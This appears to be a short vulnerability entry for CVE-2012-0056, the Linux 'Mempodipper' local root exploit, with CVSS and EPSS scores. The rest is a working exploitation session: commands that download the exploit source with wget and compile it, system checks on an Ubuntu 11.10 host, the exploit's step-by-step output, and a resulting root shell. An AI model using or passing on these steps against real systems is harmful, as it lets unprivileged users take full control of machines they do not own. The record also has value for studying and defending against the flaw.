CVSS2: 6.9 Medium
Access Vector: LOCAL
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:L/AC:M/Au:N/C:C/I:C/A:C
EPSS: 0.001 Low
Percentile: 46.4%
wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
gcc mempodipper.c -o mempodipper
netcat@netcat:~$ uname -r
3.0.0-12-generic
netcat@netcat:~$ cat /etc/issue
Ubuntu 11.10 \n \l
netcat@netcat:~$ uname -a
Linux netcat 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
netcat@netcat:~$ id
uid=1000(netcat) gid=1000(netcat) groups=1000(netcat),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)
netcat@netcat:~$ ./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================
[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x8049570.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3012/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x8049564.
[+] Executing su with shellcode.
sh-4.2#
From http://www.4shell.org/archives/2149.html
The result of my own test!